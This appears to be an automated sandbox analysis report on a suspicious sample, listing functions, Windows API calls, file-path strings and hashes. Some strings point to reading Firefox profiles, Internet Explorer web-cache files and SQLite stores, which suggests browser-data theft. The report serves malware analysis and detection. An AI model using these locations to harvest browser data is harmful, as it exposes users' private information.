                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                        • API String ID: 3510742995-2641926074
                                        • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                        • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                        • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                        • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                        Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                          • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                          • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                        • memset.MSVCRT ref: 004033B7
                                        • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                        • wcscmp.MSVCRT ref: 004033FC
                                        • _wcsicmp.MSVCRT ref: 00403439
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                        • String ID: $0.@
                                        • API String ID: 2758756878-1896041820
                                        • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                        • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                        • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                        • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                        Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                        • String ID:
                                        • API String ID: 2941347001-0
                                        • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                        • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                        • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                        • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                        Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00403C09
                                        • memset.MSVCRT ref: 00403C1E
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                          • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                        • wcscat.MSVCRT ref: 00403C47
                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • wcscat.MSVCRT ref: 00403C70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                        • API String ID: 1534475566-1174173950
                                        • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                        • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                        • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                        • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                        Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • memset.MSVCRT ref: 00414C87
                                        • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • wcscpy.MSVCRT ref: 00414CFC
                                          • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                        • API String ID: 71295984-2036018995
                                        • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                        • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                        • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                        • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                        Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcschr.MSVCRT ref: 00414458
                                        • _snwprintf.MSVCRT ref: 0041447D
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                        • String ID: "%s"
                                        • API String ID: 1343145685-3297466227
                                        • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                        • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                        • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                        • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                        Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                        • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                        • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProcessTimes
                                        • String ID: GetProcessTimes$kernel32.dll
                                        • API String ID: 1714573020-3385500049
                                        • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                        • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                        • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                        • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                        Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004087D6
                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                          • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                        • memset.MSVCRT ref: 00408828
                                        • memset.MSVCRT ref: 00408840
                                        • memset.MSVCRT ref: 00408858
                                        • memset.MSVCRT ref: 00408870
                                        • memset.MSVCRT ref: 00408888
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                        • String ID:
                                        • API String ID: 2911713577-0
                                        • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                        • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                        • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                        • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                        Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                        • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID: @ $SQLite format 3
                                        • API String ID: 1475443563-3708268960
                                        • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                        • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                        • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                        • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                        Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmpqsort
                                        • String ID: /nosort$/sort
                                        • API String ID: 1579243037-1578091866
                                        • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                        • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                        • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                        • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                        Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040E60F
                                        • memset.MSVCRT ref: 0040E629
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        Strings
                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                        • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                        • API String ID: 2887208581-2114579845
                                        • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                        • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                        • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                        • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                        Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                        • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                        • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                        • LockResource.KERNEL32(00000000), ref: 004148EF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID:
                                        • API String ID: 3473537107-0
                                        • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                        • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                        • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                        • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                        Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(02160048), ref: 0044DF01
                                        • ??3@YAXPAX@Z.MSVCRT(02170050), ref: 0044DF11
                                        • ??3@YAXPAX@Z.MSVCRT(00B46D38), ref: 0044DF21
                                        • ??3@YAXPAX@Z.MSVCRT(02170458), ref: 0044DF31
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                        • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                        • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                        • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                        Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                        • API String ID: 2221118986-1725073988
                                        • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                        • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                        • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                        • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                        Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                        • DeleteObject.GDI32(00000000), ref: 004125E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@DeleteObject
                                        • String ID: r!A
                                        • API String ID: 1103273653-628097481
                                        • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                        • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                        • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                        • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                        Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                        • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                        • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                        • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                        Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                        • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
